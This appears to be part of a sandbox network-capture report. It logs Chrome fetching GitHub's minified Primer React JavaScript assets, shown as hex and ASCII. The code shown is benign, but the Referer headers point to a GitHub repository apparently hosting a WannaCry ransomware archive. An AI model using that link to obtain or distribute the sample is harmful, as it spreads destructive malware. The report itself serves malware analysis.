                                                                                      Data Ascii: tu,WebhookIcon:()=>tf,WorkflowIcon:()=>tm,XCircleFillIcon:()=>tw,XCircleIcon:()=>tC,XIcon:()=>tp,ZapIcon:()=>tk,ZoomInIcon:()=>ty,ZoomOutIcon:()=>tx});var o=a(67294),t={small:16,medium:32,large:64};function c(r,e,a){var c=a(),n=Object.keys(c),l=o.forwardR
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 2d 2e 30 30 31 61 31 2e 32 30 36 20 31 2e 32 30 36 20 30 20 30 20 30 2d 32 2e 33 39 38 20 30 4c 36 2e 33 30 35 20 31 31 2e 35 68 33 2e 33 39 5a 4d 39 2e 35 20 33 61 31 2e 35 20 31 2e 35 20 30 20 31 20 30 2d 33 2e 30 30 31 2e 30 30 31 41 31 2e 35 20 31 2e 35 20 30 20 30 20 30 20 39 2e 35 20 33 5a 22 7d 29 7d 7d 7d 29 2c 6c 3d 63 28 22 41 63 63 65 73 73 69 62 69 6c 69 74 79 49 6e 73 65 74 49 63 6f 6e 22 2c 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 61 63 63 65 73 73 69 62 69 6c 69 74 79 2d 69 6e 73 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 31 36 3a 7b 77 69 64 74 68 3a 31 36 2c 70 61 74 68 3a 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 38 20 30 61 38 20 38 20 30 20 31 20 31 20 30 20 31
                                                                                      Data Ascii: -.001a1.206 1.206 0 0 0-2.398 0L6.305 11.5h3.39ZM9.5 3a1.5 1.5 0 1 0-3.001.001A1.5 1.5 0 0 0 9.5 3Z"})}}}),l=c("AccessibilityInsetIcon","octicon octicon-accessibility-inset",function(){return{16:{width:16,path:o.createElement("path",{d:"M8 0a8 8 0 1 1 0 1
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 34 5a 22 7d 29 29 7d 7d 7d 29 2c 64 3d 63 28 22 41 6c 65 72 74 46 69 6c 6c 49 63 6f 6e 22 2c 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 61 6c 65 72 74 2d 66 69 6c 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 31 32 3a 7b 77 69 64 74 68 3a 31 32 2c 70 61 74 68 3a 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 34 2e 38 35 35 2e 37 30 38 63 2e 35 2d 2e 38 39 36 20 31 2e 37 39 2d 2e 38 39 36 20 32 2e 32 39 20 30 6c 34 2e 36 37 35 20 38 2e 33 35 31 61 31 2e 33 31 32 20 31 2e 33 31 32 20 30 20 30 20 31 2d 31 2e 31 34 36 20 31 2e 39 35 34 48 31 2e 33 33 41 31 2e 33 31 33 20 31 2e 33 31 33 20 30 20 30 20 31 20 2e 31 38 33 20 39 2e 30 35 38 5a 4d 37 20 37 56 33 48 35 76 34 5a 6d 2d 31 20 33 61 31 20 31
                                                                                      Data Ascii: 4Z"}))}}}),d=c("AlertFillIcon","octicon octicon-alert-fill",function(){return{12:{width:12,path:o.createElement("path",{d:"M4.855.708c.5-.896 1.79-.896 2.29 0l4.675 8.351a1.312 1.312 0 0 1-1.146 1.954H1.33A1.313 1.313 0 0 1 .183 9.058ZM7 7V3H5v4Zm-1 3a1 1
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 2e 35 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 20 31 2d 31 2e 37 35 20 31 2e 37 35 68 2d 32 2e 35 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 20 31 2d 31 2e 37 35 2d 31 2e 37 35 5a 4d 33 2e 32 35 20 33 61 2e 32 35 2e 32 35 20 30 20 30 20 30 2d 2e 32 35 2e 32 35 76 32 2e 35 63 30 20 2e 31 33 38 2e 31 31 32 2e 32 35 2e 32 35 2e 32 35 68 32 2e 35 41 2e 32 35 2e 32 35 20 30 20 30 20 30 20 36 20 35 2e 37 35 76 2d 32 2e 35 41 2e 32 35 2e 32 35 20 30 20 30 20 30 20 35 2e 37 35 20 33 5a 6d 37 20 30 61 2e 32 35 2e 32 35 20 30 20 30 20 30 2d 2e 32 35 2e 32 35 76 32 2e 35 63 30 20 2e 31 33 38 2e 31 31 32 2e 32 35 2e 32 35 2e 32 35 68 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 20 30 20 2e 32 35 2d 2e 32 35 76 2d 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 20 30 2d 2e 32
                                                                                      Data Ascii: .5a1.75 1.75 0 0 1-1.75 1.75h-2.5a1.75 1.75 0 0 1-1.75-1.75ZM3.25 3a.25.25 0 0 0-.25.25v2.5c0 .138.112.25.25.25h2.5A.25.25 0 0 0 6 5.75v-2.5A.25.25 0 0 0 5.75 3Zm7 0a.25.25 0 0 0-.25.25v2.5c0 .138.112.25.25.25h2.5a.25.25 0 0 0 .25-.25v-2.5a.25.25 0 0 0-.2
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 37 35 76 39 2e 35 63 30 20 2e 31 33 38 2e 31 31 32 2e 32 35 2e 32 35 2e 32 35 68 31 36 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 20 30 20 2e 32 35 2d 2e 32 35 76 2d 39 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 31 2e 35 20 30 76 39 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 20 31 20 32 30 2e 32 35 20 32 32 48 33 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 20 31 20 32 20 32 30 2e 32 35 76 2d 39 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 2e 37 35 2d 2e 37 35 5a 22 7d 29 2c 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 39 2e 37 35 20 31 31 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 20 30 20 30 20 31 2e 35 68 34 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 20 30 20 30 2d 31 2e 35 68 2d 34 2e 35 5a 22 7d 29 29 7d
                                                                                      Data Ascii: 75v9.5c0 .138.112.25.25.25h16.5a.25.25 0 0 0 .25-.25v-9.5a.75.75 0 0 1 1.5 0v9.5A1.75 1.75 0 0 1 20.25 22H3.75A1.75 1.75 0 0 1 2 20.25v-9.5a.75.75 0 0 1 .75-.75Z"}),o.createElement("path",{d:"M9.75 11.5a.75.75 0 0 0 0 1.5h4.5a.75.75 0 0 0 0-1.5h-4.5Z"}))}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      47192.168.2.1649751185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC688OUTGET /assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-8f8c5e2a2cbf.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 15099
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 08 Feb 2024 11:06:17 GMT
                                                                                      ETag: 0x8DC2895F91375BB
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 1941885
                                                                                      X-Served-By: cache-iad-kjyo7100097-IAD, cache-ewr18132-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 53, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: ede0edc849285f45457da320fe8ead98eaec184c
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 42 6f 78 5f 42 6f 78 5f 6a 73 22 5d 2c 7b 34 32 34 38 33 3a 28 72 2c 65 2c 6f 29 3d 3e 7b 6f 2e 64 28 65 2c 7b 5a 3a 28 29 3d 3e 6e 7d 29 3b 76 61 72 20 74 3d 6f 28 31 35 33 38 38 29 2c 61 3d 6f 28 32 37 39 39 39 29 2c 69 3d 6f 28 31 35 31 37 33 29 3b 6c 65 74 20 6e 3d 74 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 42 6f 78 22 2c 63 6f 6d 70 6f 6e 65 6e 74
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_Box_Box_js"],{42483:(r,e,o)=>{o.d(e,{Z:()=>n});var t=o(15388),a=o(27999),i=o(15173);let n=t.ZP.div.withConfig({displayName:"Box",component
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6f 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 6d 61 70 28 70 29 29 2c 74 3d 69 28 74 2c 67 28 6f 2e 6d 65 64 69 61 2c 62 2c 68 2c 75 2c 72 29 29 3b 63 6f 6e 74 69 6e 75 65 7d 6e 75 6c 6c 21 3d 3d 75 26 26 28 74 3d 69 28 74 2c 66 28 6f 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2c 62 2c 68 2c 75 2c 72 29 29 2c 73 3d 21 30 29 3b 63 6f 6e 74 69 6e 75 65 7d 61 28 29 28 74 2c 62 28 75 2c 68 2c 72 29 29 7d 72 65 74 75 72 6e 20 73 26 26 28 74 3d 6e 28 74 29 29 2c 74 7d 3b 74 2e 63 6f 6e 66 69 67 3d 65 2c 74 2e 70 72 6f 70 4e 61 6d 65 73 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2c 74 2e 63 61 63 68 65 3d 6f 3b 76 61 72 20 73 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 22 63 6f 6e 66 69 67 22
                                                                                      Data Ascii: o.breakpoints.map(p)),t=i(t,g(o.media,b,h,u,r));continue}null!==u&&(t=i(t,f(o.breakpoints,b,h,u,r)),s=!0);continue}a()(t,b(u,h,r))}return s&&(t=n(t)),t};t.config=e,t.propNames=Object.keys(e),t.cache=o;var s=Object.keys(e).filter(function(r){return"config"
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6f 2c 74 29 26 26 28 72 5b 74 5d 3d 6f 5b 74 5d 29 7d 72 65 74 75 72 6e 20 72 7d 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 6f 2e 64 28 65 2c 7b 5a 50 3a 28 29 3d 3e 67 7d 29 3b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 65 2c 6f 2c 74 2c 61 29 7b 66 6f 72 28 74 3d 30 2c 65 3d 65 26 26 65 2e 73 70 6c 69 74 3f 65 2e 73 70 6c 69 74 28 22 2e 22 29 3a 5b 65 5d 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 72 3d 72 3f 72 5b 65 5b 74 5d 5d 3a 61 3b 72 65 74 75 72 6e 20 72 3d 3d 3d 61 3f 6f 3a 72 7d 2c 69 3d 5b 34 30 2c 35 32 2c 36 34 5d 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 72 2b 22 65
                                                                                      Data Ascii: ject.prototype.hasOwnProperty.call(o,t)&&(r[t]=o[t])}return r}).apply(this,arguments)}o.d(e,{ZP:()=>g});var a=function(r,e,o,t,a){for(t=0,e=e&&e.split?e.split("."):[e];t<e.length;t++)r=r?r[e[t]]:a;return r===a?o:r},i=[40,52,64].map(function(r){return r+"e
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 72 54 6f 70 3a 22 62 6f 72 64 65 72 73 22 2c 62 6f 72 64 65 72 52 69 67 68 74 3a 22 62 6f 72 64 65 72 73 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 3a 22 62 6f 72 64 65 72 73 22 2c 62 6f 72 64 65 72 4c 65 66 74 3a 22 62 6f 72 64 65 72 73 22 2c 62 6f 72 64 65 72 57 69 64 74 68 3a 22 62 6f 72 64 65 72 57 69 64 74 68 73 22 2c 62 6f 72 64 65 72 53 74 79 6c 65 3a 22 62 6f 72 64 65 72 53 74 79 6c 65 73 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 72 61 64 69 69 22 2c 62 6f 72 64 65 72 54 6f 70 52 69 67 68 74 52 61 64 69 75 73 3a 22 72 61 64 69 69 22 2c 62 6f 72 64 65 72 54 6f 70 4c 65 66 74 52 61 64 69 75 73 3a 22 72 61 64 69 69 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 52 69 67 68 74 52 61 64 69 75 73 3a 22 72 61 64 69 69 22 2c 62 6f 72 64 65 72 42 6f 74 74
                                                                                      Data Ascii: rTop:"borders",borderRight:"borders",borderBottom:"borders",borderLeft:"borders",borderWidth:"borderWidths",borderStyle:"borderStyles",borderRadius:"radii",borderTopRightRadius:"radii",borderTopLeftRadius:"radii",borderBottomRightRadius:"radii",borderBott
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 72 65 74 75 72 6e 22 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 22 2b 72 2b 22 29 22 7d 29 29 3b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 6c 29 7b 76 61 72 20 6e 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6c 5b 74 5d 3f 6c 5b 74 5d 28 72 29 3a 6c 5b 74 5d 3b 69 66 28 6e 75 6c 6c 21 3d 6e 29 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 29 7b 65 5b 74 5d 3d 6e 3b 63 6f 6e 74 69 6e 75 65 7d 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 6e 2e 73 6c 69 63 65 28 30 2c 6f 2e 6c 65 6e 67 74 68 29 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 70 3d 6f 5b 64 5d 3b 69 66 28 21 70 29 7b 65 5b 74 5d 3d 6e 5b 64 5d 3b 63 6f 6e 74 69 6e 75 65 7d 65 5b 70 5d 3d 65 5b 70 5d 7c 7c 7b 7d 2c 6e
                                                                                      Data Ascii: return"@media screen and (min-width: "+r+")"}));for(var t in l){var n="function"==typeof l[t]?l[t](r):l[t];if(null!=n){if(!Array.isArray(n)){e[t]=n;continue}for(var d=0;d<n.slice(0,o.length).length;d++){var p=o[d];if(!p){e[t]=n[d];continue}e[p]=e[p]||{},n
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 72 6e 20 4f 62 6a 65 63 74 28 72 29 7d 28 72 29 2c 70 3d 31 3b 70 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 70 2b 2b 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 69 3d 4f 62 6a 65 63 74 28 61 72 67 75 6d 65 6e 74 73 5b 70 5d 29 29 6f 2e 63 61 6c 6c 28 69 2c 73 29 26 26 28 64 5b 73 5d 3d 69 5b 73 5d 29 3b 69 66 28 65 29 7b 6e 3d 65 28 69 29 3b 66 6f 72 28 76 61 72 20 6c 3d 30 3b 6c 3c 6e 2e 6c 65 6e 67 74 68 3b 6c 2b 2b 29 74 2e 63 61 6c 6c 28 69 2c 6e 5b 6c 5d 29 26 26 28 64 5b 6e 5b 6c 5d 5d 3d 69 5b 6e 5b 6c 5d 5d 29 7d 7d 72 65 74 75 72 6e 20 64 7d 3a 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7d 2c 32 37 39 39 39 3a 28 72 2c 65 2c 6f 29 3d 3e 7b 6f 2e 64 28 65 2c 7b 4f 71 3a 28 29 3d 3e 62 2c 43 67 3a 28 29 3d 3e 66 2c 6a 6e 3a 28 29 3d 3e 4c
                                                                                      Data Ascii: rn Object(r)}(r),p=1;p<arguments.length;p++){for(var s in i=Object(arguments[p]))o.call(i,s)&&(d[s]=i[s]);if(e){n=e(i);for(var l=0;l<n.length;l++)t.call(i,n[l])&&(d[n[l]]=i[n[l]])}}return d}:Object.assign},27999:(r,e,o)=>{o.d(e,{Oq:()=>b,Cg:()=>f,jn:()=>L
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 70 61 63 69 6e 67 3a 7b 70 72 6f 70 65 72 74 79 3a 22 6c 65 74 74 65 72 53 70 61 63 69 6e 67 22 2c 73 63 61 6c 65 3a 22 6c 65 74 74 65 72 53 70 61 63 69 6e 67 73 22 7d 2c 74 65 78 74 41 6c 69 67 6e 3a 21 30 2c 66 6f 6e 74 53 74 79 6c 65 3a 21 30 7d 29 2c 70 3d 28 30 2c 74 2e 42 79 29 28 7b 61 6c 69 67 6e 49 74 65 6d 73 3a 21 30 2c 61 6c 69 67 6e 43 6f 6e 74 65 6e 74 3a 21 30 2c 6a 75 73 74 69 66 79 49 74 65 6d 73 3a 21 30 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 21 30 2c 66 6c 65 78 57 72 61 70 3a 21 30 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 21 30 2c 66 6c 65 78 3a 21 30 2c 66 6c 65 78 47 72 6f 77 3a 21 30 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 21 30 2c 66 6c 65 78 42 61 73 69 73 3a 21 30 2c 6a 75 73 74 69 66 79 53 65 6c 66 3a 21 30 2c 61 6c 69
                                                                                      Data Ascii: pacing:{property:"letterSpacing",scale:"letterSpacings"},textAlign:!0,fontStyle:!0}),p=(0,t.By)({alignItems:!0,alignContent:!0,justifyItems:!0,justifyContent:!0,flexWrap:!0,flexDirection:!0,flex:!0,flexGrow:!0,flexShrink:!0,flexBasis:!0,justifySelf:!0,ali
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 68 74 52 61 64 69 75 73 22 2c 73 63 61 6c 65 3a 22 72 61 64 69 69 22 7d 2c 62 6f 72 64 65 72 4c 65 66 74 3a 7b 70 72 6f 70 65 72 74 79 3a 22 62 6f 72 64 65 72 4c 65 66 74 22 2c 73 63 61 6c 65 3a 22 62 6f 72 64 65 72 73 22 7d 2c 62 6f 72 64 65 72 58 3a 7b 70 72 6f 70 65 72 74 69 65 73 3a 5b 22 62 6f 72 64 65 72 4c 65 66 74 22 2c 22 62 6f 72 64 65 72 52 69 67 68 74 22 5d 2c 73 63 61 6c 65 3a 22 62 6f 72 64 65 72 73 22 7d 2c 62 6f 72 64 65 72 59 3a 7b 70 72 6f 70 65 72 74 69 65 73 3a 5b 22 62 6f 72 64 65 72 54 6f 70 22 2c 22 62 6f 72 64 65 72 42 6f 74 74 6f 6d 22 5d 2c 73 63 61 6c 65 3a 22 62 6f 72 64 65 72 73 22 7d 7d 3b 67 2e 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 3d 7b 70 72 6f 70 65 72 74 79 3a 22 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 22 2c 73 63
                                                                                      Data Ascii: htRadius",scale:"radii"},borderLeft:{property:"borderLeft",scale:"borders"},borderX:{properties:["borderLeft","borderRight"],scale:"borders"},borderY:{properties:["borderTop","borderBottom"],scale:"borders"}};g.borderTopWidth={property:"borderTopWidth",sc
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 61 63 6b 67 72 6f 75 6e 64 50 6f 73 69 74 69 6f 6e 3a 21 30 2c 62 61 63 6b 67 72 6f 75 6e 64 52 65 70 65 61 74 3a 21 30 7d 3b 6d 2e 62 67 49 6d 61 67 65 3d 6d 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 2c 6d 2e 62 67 53 69 7a 65 3d 6d 2e 62 61 63 6b 67 72 6f 75 6e 64 53 69 7a 65 2c 6d 2e 62 67 50 6f 73 69 74 69 6f 6e 3d 6d 2e 62 61 63 6b 67 72 6f 75 6e 64 50 6f 73 69 74 69 6f 6e 2c 6d 2e 62 67 52 65 70 65 61 74 3d 6d 2e 62 61 63 6b 67 72 6f 75 6e 64 52 65 70 65 61 74 3b 76 61 72 20 62 3d 28 30 2c 74 2e 42 79 29 28 6d 29 2c 75 3d 7b 73 70 61 63 65 3a 5b 30 2c 34 2c 38 2c 31 36 2c 33 32 2c 36 34 2c 31 32 38 2c 32 35 36 2c 35 31 32 5d 7d 2c 68 3d 7b 70 6f 73 69 74 69 6f 6e 3a 21 30 2c 7a 49 6e 64 65 78 3a 7b 70 72 6f 70 65 72 74 79 3a 22 7a 49 6e 64 65
                                                                                      Data Ascii: ackgroundPosition:!0,backgroundRepeat:!0};m.bgImage=m.backgroundImage,m.bgSize=m.backgroundSize,m.bgPosition=m.backgroundPosition,m.bgRepeat=m.backgroundRepeat;var b=(0,t.By)(m),u={space:[0,4,8,16,32,64,128,256,512]},h={position:!0,zIndex:{property:"zInde
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 72 67 69 6e 2c 42 2e 6d 61 72 67 69 6e 2e 6d 74 3d 42 2e 6d 61 72 67 69 6e 2e 6d 61 72 67 69 6e 54 6f 70 2c 42 2e 6d 61 72 67 69 6e 2e 6d 72 3d 42 2e 6d 61 72 67 69 6e 2e 6d 61 72 67 69 6e 52 69 67 68 74 2c 42 2e 6d 61 72 67 69 6e 2e 6d 62 3d 42 2e 6d 61 72 67 69 6e 2e 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 2c 42 2e 6d 61 72 67 69 6e 2e 6d 6c 3d 42 2e 6d 61 72 67 69 6e 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 42 2e 6d 61 72 67 69 6e 2e 6d 78 3d 42 2e 6d 61 72 67 69 6e 2e 6d 61 72 67 69 6e 58 2c 42 2e 6d 61 72 67 69 6e 2e 6d 79 3d 42 2e 6d 61 72 67 69 6e 2e 6d 61 72 67 69 6e 59 2c 42 2e 70 61 64 64 69 6e 67 3d 7b 70 61 64 64 69 6e 67 3a 7b 70 72 6f 70 65 72 74 79 3a 22 70 61 64 64 69 6e 67 22 2c 73 63 61 6c 65 3a 22 73 70 61 63 65 22 2c 64 65 66 61 75 6c 74 53 63
                                                                                      Data Ascii: rgin,B.margin.mt=B.margin.marginTop,B.margin.mr=B.margin.marginRight,B.margin.mb=B.margin.marginBottom,B.margin.ml=B.margin.marginLeft,B.margin.mx=B.margin.marginX,B.margin.my=B.margin.marginY,B.padding={padding:{property:"padding",scale:"space",defaultSc


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      48192.168.2.1649752185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC694OUTGET /assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-d5726d25c548.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 13626
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 14 Mar 2024 01:46:03 GMT
                                                                                      ETag: 0x8DC43C881E386EA
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 393056
                                                                                      X-Served-By: cache-iad-kjyo7100139-IAD, cache-ewr18151-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 76, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 09dd57b02de5a22cba623d8e6502646c10377f95
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 42 75 74 74 6f 6e 5f 42 75 74 74 6f 6e 5f 6a 73 22 5d 2c 7b 38 38 32 31 36 3a 28 6f 2c 74 2c 65 29 3d 3e 7b 65 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 69 2c 72 3a 28 29 3d 3e 64 7d 29 3b 76 61 72 20 6e 3d 65 28 36 37 32 39 34 29 2c 61 3d 65 28 32 31 34 31 33 29 2c 72 3d 65 28 37 32 36 31 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 72 65 74 75 72 6e 28 6c 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_Button_Button_js"],{88216:(o,t,e)=>{e.d(t,{Z:()=>i,r:()=>d});var n=e(67294),a=e(21413),r=e(7261);function l(){return(l=Object.assign?Objec
